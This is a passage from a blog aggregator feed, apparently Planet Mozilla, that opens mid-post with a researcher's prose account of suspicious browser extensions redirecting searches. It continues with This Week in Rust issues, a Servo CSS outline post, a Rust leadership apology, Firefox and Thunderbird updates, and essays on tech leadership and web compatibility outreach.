As with PDF Toolbox, I cannot observe the malicious code in action. The configuration data produced by serasearchtop[.]com is always empty for me. Maybe it’s not currently active, maybe it only activates some time after installation, or maybe I have to be in a specific geographic region. Impossible to tell.

So I went checking out what other people say. Many reviews for these extensions appear to be fake. There are also just as many reviews complaining about functional issues: people notice that these extensions aren’t really being developed. Finally, a bunch of Brisk VPN reviews mention the extension being malicious, sadly without explaining how they noticed.

But I found my answer in the reviews for the Image Download Center extension:

Review by Sastharam Ravendran in July 2021: SPAM. Please avoid. Few days after install, my search results in google were randomly being re-directed elsewhere. I was lost and clueless. I disabled all extensions and enabled them one by one to catch this culprit. Hate it when extension developers, use us as baits for such things. google should check and take action ! A reply by Mike Pemberton in January 2022: had the same happen to me with this extension from the Micrsoft edge store. Another reply by Ande Walsh in September 2021: This guy is right. This is a dirty extension that installs malware. AVOID.

So it would seem that at least back in 2021 (yes, almost two years ago) the monetization approach of this extension was redirecting search pages. I’m pretty certain that these users reported the extension back then, yet here we still are. Yes, I’ve never heard about the “Report abuse” link in Chrome Web Store producing any result. Maybe it is a fake form only meant to increase customer satisfaction?

There is a similar two years old review on the OneCleaner extension:

Review by Vincent Descamps: Re-adding it to alert people: had to remove it, contains a malware redirecting to bing search engine when searching something on google using charmsearch.com bullcrap

Small correction: the website in question was actually called CharmSearching[.]com. If you search for it, you’ll find plenty discussions on how to remove malware from your computer. The domain is no longer active, but this likely merely means that they switched to a less known name. Like… well, maybe serasearchtop[.]com. No proof, but serasearchtop[.]com/search/?q=test redirects to Google.

Mind you: just because these extensions monetized by redirecting search pages two years ago, it doesn’t mean that they still limit themselves to it now. There are way more dangerous things one can do with the power to inject arbitrary JavaScript code into each and every website.

This Week In RustThis Week in Rust 497

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on Twitter or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Official
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is progenitor, an OpenAPI client generator with support for strongly typed mock tests.

Thanks to John Vandenberg for the suggestion!

Please submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from the Rust Project

325 pull requests were merged in the last week

Rust Compiler Performance Triage

A good week overall, with a broad set of improvements to many primary benchmarks. The main single source of primary regressions is from rollup PR #111869; we are in the process of narrowing that down to see if there is a root cause.

Triage done by @pnkfelix. Revision range: cda5becc..1221e43b

3 Regressions, 3 Improvements, 3 Mixed; 4 of them in rollups 26 artifact comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
New and Updated RFCs
Call for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Upcoming Events

Rusty Events between 2023-05-31 - 2023-06-28 🦀

Virtual
Asia
Europe
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

Panics are overgrown ASSERTs, not an underbuilt exception system.

Stephan Sokolow on hacker news

Thanks to Stephan Sokolow for the self-suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, andrewpollack, U007D, kolharsam, joelmarcey, mariannegoldin, bennyvasquez.

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

The Servo BlogAdding support for ‘outline’ properties

As mentioned in our last blog post, we’re currently working on selecting a layout engine for Servo between the original Layout 2013 and the newer Layout 2020.

Our plan has been to start by implementing some small features in Layout 2020, to help us decide whether to switch to the new layout engine, and in turn tackle more complex features like floats. One of these features was ‘outline’, which is now supported in the new engine.

A few days ago, we landed support for ‘outline’ and ‘outline-offset’. These properties are now fully supported in Servo, with two minor caveats:

  • Snap border and outline widths at computed-value time — this is blocked on a Stylo upgrade to avoid diverging from Firefox
  • The ‘outline-style’ value ‘auto’ currently works like ‘solid’ — this is allowed by the spec, but we may be able to do something better here, like rounding the corners of the outline or matching the platform style

The impact of this feature is most noticeable in the focus styles for links and input fields. For example, the User Agent stylesheet already applies ‘outline: thin dotted’ to ‘a:focus’, so clicking the first link in

Lorem ipsum <a href="#">dolor sit amet</a>,
consectetur <a href="#">adipiscing elit</a>.

now yields

Text with two links where the first one is focused so it has a thin outline around it

Implementation

The bulk of the feature was implemented in #29695 (‘outline’) and #29702 (‘outline-offset’):

  1. In {longhands,shorthands}/outline.mako.rs, we enable ‘outline-offset’, ‘outline-color’, and ‘outline’ in Layout 2020, and remove the pref gates for ‘outline-style’ and ‘outline-width’, allowing those properties to be resolved and queried
  2. In BoxFragment::build_stacking_context_tree_for_children, we check ‘outline-width’ and (if non-zero) push a StackingContextFragment to remind ourselves to paint an outline for the box fragment when building its display list
  3. In StackingContext::build_display_list, we search for those reminders and paint the necessary outlines, but only after all other kinds of content in the stacking context (“out-of-band”)
  4. In BuilderForBoxFragment::build, we now need to handle requests to paint the Outline, not just the BlockBackgroundsAndBorders
  5. In BuilderForBoxFragment::build_outline, we paint the outline by creating a BorderDisplayItem in WebRender, while taking the ‘outline-offset’ into account

We also improved the shorthand serialisation in #29708, by replacing the #[derive(ToCss)] for ‘outline’ with a custom impl that returns ‘auto’ in the case where all of the longhands are set to initial values.

Tests and spec issues

The spec allows outlines to be painted either in-band, such that other elements can obscure them, or out-of-band, on top of all other content in the stacking context. We chose the latter, because it’s the recommended approach for accessibility and matches other browsers.

For example, the magenta element below overlaps the blue border of the previous element, but not the out-of-band cyan outline:

<div style="
    outline: 5px solid cyan;
    border: 5px solid blue;
">Lorem ipsum</div>
<div style="
    background: magenta;
    margin-top: -15px;
    width: 50px;
    height: 50px;
"></div>

Painting order is blue border, then magenta background, then “Lorem ipsum” and cyan outline

‘outline’ already has good test coverage, though during our implementation we added one new test to check that ‘background-clip’ works as expected with ‘border-radius’, which affects both borders and outlines in Servo.

We’ve also filed two spec issues:

As always, despite ‘outline’ being a well-known property that has long been implemented by all of the major engines, with every new implementation comes new opportunities to clarify specs and improve test coverage. Building features like ‘outline’ helps the web platform as much as it helps Servo.

The Rust Programming Language BlogOn the RustConf keynote

On May 26th 2023, JeanHeyd Meneide announced they would not speak at RustConf 2023 anymore. They were invited to give a keynote at the conference, only to be told two weeks later the keynote would be demoted to a normal talk, due to a decision made within the Rust project leadership.

That decision was not right, and first off we want to publicly apologize for the harm we caused. We failed you JeanHeyd. The idea of downgrading a talk after the invitation was insulting, and nobody in leadership should have been willing to entertain it.

Everyone in leadership chat is still working to fully figure out everything that went wrong and how we can prevent all of this from happening again. That work is not finished yet. Still, we want to share some steps we are taking to reduce the risk of something like this from happening again.

The primary causes of the failure were the decision-making and communication processes of leadership chat. Leadership chat has been the top-level governance structure created after the previous Moderation Team resigned in late 2021. It’s made of all leads of top-level teams, all members of the Core Team, all project directors on the Rust Foundation board, and all current moderators. This leadership chat was meant as a short-term solution and lacked clear rules and processes for decision making and communication. This left a lot of room for misunderstandings about when a decision had actually been made and when individuals were speaking for the project versus themselves.

In this post we focus on the organizational and process failure, leaving room for individuals to publicly acknowledge their own role. Nonetheless, formal rules or governance processes should not be required to identify that demoting JeanHeyd’s keynote was the wrong thing to do. The fact is that several individuals exercised poor judgment and poor communication. Recognizing their outsized role in the situation, those individuals have opted to step back from top-level governance roles, including leadership chat and the upcoming leadership council.

Organizationally, within leadership chat we will enforce a strict consensus rule for all decision making, so that there is no longer ambiguity of whether something is an individual opinion or a group decision. We are going to launch the new governance council as soon as possible. We’ll assist the remaining teams to select their representatives in a timely manner, so that the new governance council can start and the current leadership chat can disband.

We wish to close the post by reiterating our apology to JeanHeyd, but also the wider Rust community. You deserved better than you got from us.

-- The members of leadership chat

Data@MozillaThis Week in Data: Reading “The Manager’s Path” by Camille Fournier

(“This Week in Glean Data” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean. You can find an index of all TWiG posts online.)

Recently I’ve been granted the role of “tech-lead” of the Glean SDK, where I find myself responsible for more of the direction and communication regarding Glean. As part of my continuing professional development, I sat down to read “The Manager’s Path: A Guide for Tech Leaders Navigating Growth and Change” by Camille Fournier. The book focuses on several aspects of technical management up to and including managing several teams. I’d like to focus on the things that I took away from the book through the lens of my new role as tech-lead in this blog, most of which come from a couple of chapters in the book. Don’t take that as the rest of the content not being anything less than really good, only that I’m choosing to take a narrow focus. I felt it was more appropriate and personal to share what I took away from it related to my new responsibilities. I highly recommend this book to any contributor, management or otherwise, as it can give you great insight into what good (and bad) management looks like, with some really good examples that delineate the idealistic views from the realistic views of different situations. So, without further ado, let’s get started with the things I gleaned from this book through the eyes of a new tech-lead.

The definition of “tech-lead” offered in the Tech-Lead chapter was one I both liked and agreed with. Basically, tech-leads aren’t necessarily the most senior person on the team, they are someone willing to take on the set of responsibilities of representing the team to management, vetting plans, and dealing with project management details. Tech-leads focus on these things so that the team as a whole can be more productive. Now that I find myself the tech-lead of Glean, my productivity comes second to the overall team’s effectiveness. The book suggests that the best trick a tech-lead can learn is the ability to step away from the code and balance their technical commitments with the needs of the team. This balancing act is something that I’m still working on, and has meant being more deliberate in managing my schedule and including focus times to get things done.

Another topic from the same chapter is the defining characteristics of the role. This, unsurprisingly, includes the importance of communication. This is something that I already knew from past experience, but the book reiterated to me that taking the time to explain things and listening can be extremely helpful, even in roles with newfound expectations of our expertise. It also includes having a thorough understanding of the architecture of the project so that you can make informed decisions that take the project as a whole into consideration and be able to offer more constructive feedback to changes. This allows the tech-lead to be able to “lead” the technical decisions rather than “make” all of them. Sometimes a tech-lead isn’t the expert in a particular aspect of the project. It falls on the tech-lead to understand who on the team has the context and knowledge to make the best decisions and empower them to do so. The final key characteristic of a tech-lead is that they are first and foremost a team player. They shouldn’t be doing all the interesting work themselves, they should instead be looking at the tricky and boring things and figuring out how to get them unstuck. But they also shouldn’t be doing only boring work, either. Being a tech-lead does mean less time to work on code some days, so knowing what you can (and can’t) commit to is also vital; being able to delegate effectively is critical.

The book points out that being a tech-lead is about managing projects as well as the team’s efforts towards them. The distinction the book makes between these is that managing projects tends to be more about managing time and complexity, while managing the team is more about trust and mentoring. Both have a strong overlap on communication being a key part of the formula for success. A tech-lead needs to be able to communicate about projects to different stakeholders, both in a way that management understands and in the more technical communications with the theme. Being able to break down complex work into a series of deliverable tasks is only part of the picture. Knowing the level of detail that a particular project needs also plays into this because not every project needs the same level of project management. Ultimately, a tech-lead’s project management duties are about developing the discipline to think about something before diving into it and understanding how to structure the work so the team can better deliver on it.

Another chapter that I found tied in well with the tech-lead content that I’ve focused on so far is the chapter on “Mentoring”. Being a tech-lead is also about helping those around you reach their own goals, which means keeping up with regular one-on-one meetings with team members so that you can be aware of the challenges that they are facing and the successes they are having. This allows you to be able to provide guidance early and help unblock the team and to be able to call out these successes to management and peers. Being a tech-lead also means being open to the idea that you are now a source of feedback on career growth for your team. A willingness to share your insights into things that have helped you grow can help your teammates to identify areas they could potentially grow.

Finally, in the chapter on “Managing People” I found additional helpful information that tied in nicely with the other concepts that resonated with me in this book. This chapter mostly focuses on the importance of building relationships through trust and rapport, and how to clearly communicate your expectations. There’s also a ton of tips on how to improve these skills as well as how to structure and schedule your one-on-one meetings for success. I really appreciated the chapter mentioning how important it is to create a culture of continuous feedback. All of this points to the importance of communication and provides several useful examples of how to do it more effectively.

Like I mentioned before, the whole book is really well written with a great flow that builds upon each chapter. Each chapter is filled with great information for anyone in or considering a lead or management position. There’s a lot of very helpful communication and time management wisdom, even if you aren’t considering a leadership direction for your career. This blog post was purposefully scoped to my experiences, but I hope it was enough to encourage you to consider reading “The Manager’s Path: A Guide for Tech Leaders Navigating Growth and Change” by Camille Fournier, it’s definitely worth it!

The Mozilla BlogAdvancing the future of the internet with Adam Bouhenguel

A head shot of Adam Bouhenguel atop an illustration of cubes.<figcaption class="wp-element-caption">Adam Bouhenguel has partnered with Mozilla to look for new ways to build ecosystems that support builders working on the next generation of the web.</figcaption>

More than ever, we need a movement to ensure the internet remains a force for good. This post introduces the Mozilla Internet Ecosystem (MIECO) program, which fuels this movement by supporting people who are looking to advance a more human-centered internet. With MIECO, Mozilla is looking to foster a new era of internet innovation that moves away from “fast and breaking things” and into a more purposeful, collaborative effort that includes voices and perspectives from many different companies and organizations.

Today, we’re highlighting the work of Adam Bouhenguel, who has partnered with Mozilla to look for new ways to build ecosystems that support builders working on the next generation of the web.


Adam Bouhenguel has been building things for a long time. 

“As a kid, I would go to museums and fairs and see machines that people had built, or reproductions of famous machines throughout history, and then I would go home and build them out of Legos,” Adam said of his childhood in South Florida. 

Once, a friend told him that their cousin built games on calculators, so Adam carried around programming books until he learned how to program. “I spent a lot of time writing the things that I wanted to play,” Adam recalled. “So that was always a strong motivator for me.” 

Adam participated in programming and math competitions in high school. Before graduating, he interned at Motorola’s robotics group, where he developed software that ended up shipping with the company’s phones. Adam went on to attend MIT, during which he continued to work for Motorola.

“I realized how powerful tools can be,” Adam said. “If you have the right tools and the right ideas about what those tools should do, you can get much farther than you otherwise would.”

Adam’s love of technology and building found an early home at YCombinator in 2007, where he launched his first company with a goal of simplifying the process of building software for mobile phones. At the time, the iPhone had yet to be announced, and Adam was already thinking about ways to make things easier for creators and developers — a mission that he’s continued working on over the past 15 years. 

Today, Adam is using his experience as founder and community advocate to work with Mozilla on new ways to support builders, researchers, and individuals who are ready to be part of a larger movement for change in the way that we build the internet.

When Imo Udom joined Mozilla as the senior vice president of innovation towards the end of 2021, he knew that building a future home for innovation that could expand on the growth of Mozilla’s past 25 years would require new models for thinking about the ways that we work together. In late 2022, Mozilla launched the inaugural cohort of the Mozilla Internet Ecosystem (MIECO) program, where Imo worked closely with Adam to understand the landscape that researchers, computer scientists, and creators were facing and identifying ways to support the changing dynamics of building technology. MIECO is an opportunity to shift the way that we think about building software from a single corporate model to one that is grounded in community and open collaboration. 

Exploring new ways of collaborating is a theme throughout Adam’s work. His current MIECO projects, which include the Open Retrospective Contributor Agreement (ORCA), Metered.dev, and Research Portfolio, all seek to give developers and researchers new tools to share and iterate on their work. As more of the world gains access to the internet, Adam sees a need for different models for attribution and sharing in the value generated by different projects and ideas.

ORCA, which allows open source project maintainers to fund contributors, is just one example of an experimental new approach that may encourage more organizations and individuals to work in the open. Making sure that people’s respective work is acknowledged and valued, Adam says, will encourage innovation and translate to better products in the market. While ORCA is in its infancy, it shows promise in helping people shift their thinking about what the future of compensation might look for within technological ecosystems.   

Adam believes that making it easier for developers to monetize their work will lead to more sharing of ideas, with the ultimate goal of creating better solutions for some of the most challenging problems that we’re facing as a society today. With that goal in mind, he created Metered.dev, a platform for developers to easily publish and charge for the software that they’re creating, and Research Portfolio, a way for researchers to record and reward the influential work that has shaped their own thinking. 

Making sure that people’s respective work is acknowledged and valued, Adam said, will encourage innovation and translate to better products in the market.

Adam hopes that ultimately, people are inspired to think deeper about the software they choose to use.

“We’ll get to see what things are based on, what they’re inspired by,” Adam said. “We can give credit to these ideas that become software that we depend on and benefit from.”

The post Advancing the future of the internet with Adam Bouhenguel appeared first on The Mozilla Blog.

Karl DubostWebcompat Outreach, Mon Amour…

I was listening a podcast by Brian Kardell and Eric Meyer. Toward the end, they are mentioning the challenges of outreach in the context of broken Web sites.

Brian says:

It would have to be, enough people would have to complain. A browser wouldn't tell a lie if they could reach out and get you to update it.

I wrote in the past about the need for browsers to lie to websites and the consequences for both the websites.

  1. Websites fails to support a browser A for a reason X. Sometimes not enough market share for them to care.
  2. The browser A lies to be able to get the right code path.
  3. The websites analytics show that browser A is not accessing the website.
  4. Goto 1.

And if you wanted to update my website or your website, that would be relatively easy. They would just send us an email and we'd be like, 'Oh, crap, let me fix that right away.'

It's not that easy. It is still hard to contact individuals. It takes time. The person has sometimes no real control over their "personal website". And the Benefits/Cost Ratio is very low. (Note that Brian and Eric were talking about their actual personal websites and indeed this is easier to contact public tech savy people.)

But when it comes to Wells Fargo, or Yahoo, or some big site with lots and lots and lots of people who go there…

Here it depends on the category of websites. Yahoo! is a lot easier to contact, than certain types of websites:

  • Bank
  • Casino
  • Illegal streaming
  • certain Adult content
  • Governments
  • All sites which are flyers or one-off marketing stunts

Another parameter: culture!

The structure of business for creating websites and the relationships of the Web developers with their direct and indirect hierarchy is not the same depending on the regions of the world. For some Web developers it will be very hard to be able to challenge the decision making process with regards to a website. In some circumstances, the bottom-up approach of contacting will not work, and you would need to go to a top-down approach.

Brian continues:

CNN.com, right. And can we actually reach them? Can we get them to change it? Even worse, for ones that are under the covers, they're the same, but you don't know. They resell, effectively. It's a website's package and it gets very, very hard to know who to reach. They're unresponsive, because they've sort of outsourced their website, really. So there's not always a person you can reach out to. But in the meantime, everybody's going to complain, so they'll lie. And those are the sites really. Those sites are going to be included every time. You know what I mean?The things that we estimate usage on are estimated from looking at the HP requests to lots and lots and lots of websites. And then it's extrapolated from there. But the set of websites is which ones are popularly loaded. And in the grand scheme of things, our websites are not destinations.

So it's when I thought about the title of this post: Webcompat Outreach, Mon Amour. Last time, I used that reference, it put me in hot waters, because the person, reading this in a comment, thought I was literal and actually calling her "Mon Amour", while I was making a reference to Hiroshima Mon Amour, a movie by Alain Resnais, and written by Marguerite Duras. Culture differences as mentioned earlier. This poetic movie is subtly revealing our tensions at a global and personal level.

Still from the movie where the main actress says: Sometimes we have to avoid thinking about the problems life presents. Otherwise we'd suffocate.

Hence webcompat outreach where the simple minimal code mistakes or choices affects a large number of people. Each decisions we make have consequences on the balance of the ecosystem. We pour love into our art craft and still be constrained by the machinery of the administration.

I have written about outreach multiple times. You do not need to work for a big company to be able to contact a website, and every invidual can help by communicating clearly to people handling the website presenting issues. This is not an impossible task. It just takes patience, courage and resilience.

In what do you need to do before doing outreach, my last section, mentioned all the reasons why the outreach might fail. There are techniques to try to find people online and to track down who to contact. On the webcompat.com website, I had written about different techniques to find a way to reach the right person and the attitudes you need to have:

  • Be tactful: People we are trying to reach have their own set of constraints, bosses, economic choices etc. "Your web site is bad" will not lead anywhere, except NOT getting the site fixed.
  • Be humble: We are no better, we also make mistakes in practice. Our own recommendations can become outdated as technical or economic circumstances change.
  • Let it go: Sometimes outreach just doesn't work. The person at the end of the other line may say "no" or worse, may not answer. It can be very frustrating. It's okay. Accept it and move on.
  • Be passionate: The passion is in being able to find the right contact in a company without harassing them. Every effort helps.
  • Share with consideration: Share any contact you attempted or made in the issue comments section. It helps everyone to know the status so they can pitch in or not repeat work. That said - be careful to not disclose private information such as names and emails. You may simply say: "I contacted someone at $COMPANY", "Someone from $COMPANY said this…"

Otsukare!

Mozilla ThunderbirdIntroducing The Brand New Thunderbird Logo!

A circular app icon resembling a blue elemental bird, wrapped around and protecting a white envelope.

Hello Thunderbird Family! After nearly 20 years, we are thrilled to share a completely redesigned Thunderbird logo that honors our history and vital connection to Mozilla, while carrying us forward into the next 20 years.

It’s no secret that after many years of being viewed as stagnant, Thunderbird is enjoying a resurgence. Our project is thriving with a renewed sense of purpose, and we see an invigorating energy bubbling up from our users, our community of contributors, and our core team. 

Just like the software, the current Thunderbird logo has seen small, iterative improvements throughout the last 20 years. But now the software is evolving into something more modern (while retaining its powerful customization) and we believe it deserves a fresh logo that properly represents this revitalization. 

But you should never forget your roots, which is why we asked Jon Hicks, the creator of the original Firefox and Thunderbird logos, to re-imagine his iconic design in light of Thunderbird’s exciting future. 

Here’s a look at our new logo across Linux, Windows, macOS, Android, and iOS.

The new logo for Thunderbird, with slight variations for different operating systems. It's  circular app icon resembling a blue elemental bird, wrapped around and protecting a white envelope. <figcaption class="wp-element-caption">Yes, we have officially added an iOS version of Thunderbird to our future development roadmap. Expect more concrete news about this toward the end of 2023.</figcaption>
The new logo for Thunderbird, with slight variations for different operating systems, pictured here for Android. It's a circular app icon resembling a blue elemental bird, wrapped around and protecting a white envelope.

And here’s a glimpse of what Thunderbird for Android will look like on an Android device, sitting next to our best friend Firefox:

side-by-side screenshots of an Android device, highlighted by Thunderbird and Firefox logos.

When can you see it integrated with Thunderbird itself? Our plan is to incorporate it into Thunderbird 115 (code-named “Supernova“) this summer. During the next few months, we’ll also gradually redesign our website and update the branding on various social channels and communication platforms.

We understand that change can be uncomfortable, but we hope you agree this is a positive new look for the project. I encourage everyone to do what we did throughout this process: to live with the new design for a while. Let it breathe, let it sink in, and let us know what you think after a few days.

We all have a soft spot for the old Thunderbird logo (which I affectionately call the “wig on an envelope”), but our project is changing in big, positive ways, and we want to clearly show that to the world with a beautiful, revitalized logo and icon.

So here’s to a bright future! On behalf of the entire team: thank you for taking this journey with us. We wouldn’t be here without you.

Ryan Sipes
Thunderbird Product Manager

 

The post Introducing The Brand New Thunderbird Logo! appeared first on The Thunderbird Blog.

Anne van KesterenWebKit and web-platform-tests

Let me state upfront that this strategy of keeping WebKit synchronized with parts of web-platform-tests has worked quite well for me, but I’m not at all an expert in this area so you might want to take advice from someone else.

Once I've identified what tests will be impacted by my changes to WebKit, including what additional coverage might be needed, I create a branch in my local web-platform-tests checkout to make the necessary changes to increase coverage. I try to be a little careful here so it'll result in a nice pull request against web-platform-tests later. I’ve been a web-platform-tests contributor quite a while longer than I’ve been a WebKit contributor so perhaps it’s not surprising that my approach to test development starts with web-platform-tests.

I then run import-w3c-tests web-platform-tests/[testsDir] -l -s [wptParentDir] --clean-dest-dir on the WebKit side to ensure it has the latest tests, including any changes I made. And then I usually run them and revise, as needed.

This has worked surprisingly well for a number of changes I made to date and hasn’t let me down. Two things to be mindful of:

  • On macOS, don’t put development work, especially WebKit, inside ~/Documents. You might not have a good time.
  • [wptParentDir] above needs to contain a directory named web-platform-tests, not wpt. This is annoyingly different from the default you get when cloning web-platform-tests (the repository was renamed to wpt at some point). Perhaps something to address in import-w3c-tests.

This Week In RustThis Week in Rust 496

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on Twitter or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Research
Miscellaneous

Crate of the Week

This week's crate is whichlang, a fast no-dependencies OSS natural language detector.

Thanks to Brian Kung for the suggestion!

Please submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from the Rust Project

314 pull requests were merged in the last week

Rust Compiler Performance Triage

There were a few regressions, but most were expected, and one in particular (PR #111807) is expected yield gains in object code performance at the expense of a slight compile-time hit. There are a couple PR's that need future followup, namely PRs #111364 and #111524.

Triage done by @pnkfelix. Revision range: 3ea9ad53..cda5becc

3 Regressions, 2 Improvements, 5 Mixed; 2 of them in rollups 51 artifact comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

  • No RFCs were approved this week.
Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
New and Updated RFCs
Call for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

  • No RFCs issued a call for testing this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Upcoming Events

Rusty Events between 2023-05-24 - 2023-06-21 🦀

Virtual
Asia
Europe
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

I guess the nicest example of this phenomenon is shared mutability. Programmers have been arguing for decades whether it is sharing xor mutability that causes memory safety bugs:

  • "It's threads!" – shouted JavaScript and Python, and JS remained single-threaded, and Python introduced the GIL.
  • "It's mutability!" – screamed Haskell and Erlang, and they made (almost) everything immutable.

And then along came Rust, and said: "you are fools! You can have both sharing and mutability in the same language, as long as you isolate them from each other."

H2CO3 on rust-users

Thanks to Jacob Pratt for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, andrewpollack, U007D, kolharsam, joelmarcey, mariannegoldin, bennyvasquez.

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

Firefox NightlyA Bountiful Blend of Browser Betterments – These Weeks in Firefox: Issue 138

Highlights

Friends of the Firefox team

Resolved bugs (excluding employees)

Script to find new contributors from bug list

Volunteers that fixed more than one bug
  • Gregory Pappas [:gregp]
  • Itiel
  • Mathew Hodson
  • Pier Angelo Vendrame
New contributors (🌟 = first patch)

 

Project Updates

Add-ons / Web Extensions

WebExtensions Framework
  • Fixed NativeMessaging API regression due to missing Unix-style path normalization on Windows (introduced by Bug 1772932 in Firefox 114, and fixed by Bug 1830605 in the same Nightly cycle)
  • Starting from Firefox 114, a deprecation warning will be logged when `browser_style: true` is being used for the MV3 extension manifests (Bug 1827910, Bug 1832578)
  • Extensions Button
    • Itiel contributed some more cleanups to the extensions button/panel CSS (Bug 1818622), thanks Itiel!

Developer Tools

DevTools
  • Canadahonk made it possible to display support conditions for `@import` CSS rules in the Rule view (bug)
    • `layout.css.import-supports.enabled`Screenshot of devtools Rule view showing CSS @import support conditions.
  • arai improved eager evaluation in Worker (bug)
  • Blackboxing in debugger was improved:
    • Hubert updated styling of ignored sources (bug)
    • He also added an option to hide blackboxed sources in the sources tree (bug)Screenshot of the devtools Debugger panel and a context menu item "Hide Ignored Sources".
    • Alex made jsTracing Ignore blackboxed sources (bug)
  • Speaking of tracing, stdout traces now have hyperlinks which can be opened in the Firefox debugger (bug)
  • Alex made stepping in the callstack more consistent when dealing generated and original sources (bug)
  • Alex fixed a bug in the inspector that would break markup view search when an iframe had node children, which is something uBlock does on some elements it blocks (bug)
  • Nicolas fixed an issue in console that would create an infinite loop in parent process on very short-lived documents (bug)
WebDriver BiDi
  • Julian made it possible to use elements as reference for an action (e.g. click on a specific element instead of a click at given viewport coordinates) (bug)
  • Sasha vendored puppeteer v20.1.0 (bug)

ESMification status

  • ESMified status:
    • browser: 68%
    • toolkit: 87%
    • Total: 81.6% (up from 75.5%)
  • #esmification on Matrix
  • Migration Document (with a walkthrough!)

Lint, Docs and Workflow

  • The enabling of Prettier on JSON files has now landed.
  • Gijs has landed stylelint for css linting.
    • This will flag up errors in your CSS, like duplicate properties, invalid syntax, missing generic font families, etc. In some cases it can auto-fix things.
    • We will expand this in the next few weeks/months to cover conventions in use in Firefox (e.g. using “em” for font-size over “px”, preferring logical over physical margin/padding/border/float definitions, using “0” without a unit for sizes, etc.)
    • This is not a formatter like prettier, so it doesn’t currently adjust whitespace, indenting etc.
  • `./mach lint .` now works in parallel mode for faster linting. Previously only `./mach lint *` would work, but that didn’t pick up the top-level dot files.
  • Next up, is to upgrade Prettier and enable it for production HTML files.
    • The upgrade does change a significant number of JS files due to changes in Prettier’s formatting.
    • We decided to put off enabling it on test files for now, due to the large amount of files affected.

Migration Improvements

New Tab Page

Picture-in-Picture

Search and Navigation

Storybook/Reusable Components

The Mozilla BlogHere is your secret weapon to conquering your overflowing inbox

Recently, I came across a post in one of my Facebook groups. This group is primarily women who juggle their job in the tech space while raising children. The post asked if people used multiple emails to limit exposure to account breaches and if so, they wanted advice on setting it up. First, I was surprised people cared enough to plan ahead for data breaches. I was also surprised at the responses, and I didn’t realize how much time people spend organizing their emails and online accounts. 

I learned that, first, people didn’t mind having more than one email account to manage. Many people had several individual email accounts for personal, job search, kids school, travel and e-commerce. Some had an individual email address “strictly for bank/financial information.” Another person wrote: “Email addresses will always end up in breaches, sooner or later. The important part is to never, ever reuse the same password for multiple accounts and activate MFA (multi-factor authentication) whenever possible.

I was curious, so I posted a similar question to my network of friends, previous coworkers and colleagues on LinkedIn. Sure enough, there were similar themes, even though it was on a different platform with different goals. Since LinkedIn is geared toward a more professional audience, the responses were focused on people who had their own consulting business, so separation of work and personal life was essential. Here’s what I heard back: 

Great question! I have a personal email, professional email and then some of my clients have asked that I use their domain for communication with their teams. One way you can do this is through “email siblings.” https://www.cnet.com/tech/services-and-software/6-clever-gmail-tricks-to-minimize-regret-frustration-and-spam/

I have an insane amount of emails. Several for personal use. Most of my emails auto-forward to one of my main emails for ease. I have all of them, so I’m not giving out one personal email for everything.

I have one for my agency, one for my artistic hobbies (voice over and ceramics), one for general junk email and one for professional stuff that doesn’t fall into the other categories. It’s kind of a lot, but I feel more organized that way. All are hosted by Gmail and I also have two custom domains.

I have social, banking, spam/shopping, I check none of those, then separate for personal but professional and then personal where friends and travel stuff go, and I actually occasionally check the last 2. I also have one for each of my businesses and of course work email. I barely ever check any inbox, and that’s a whole another thread.

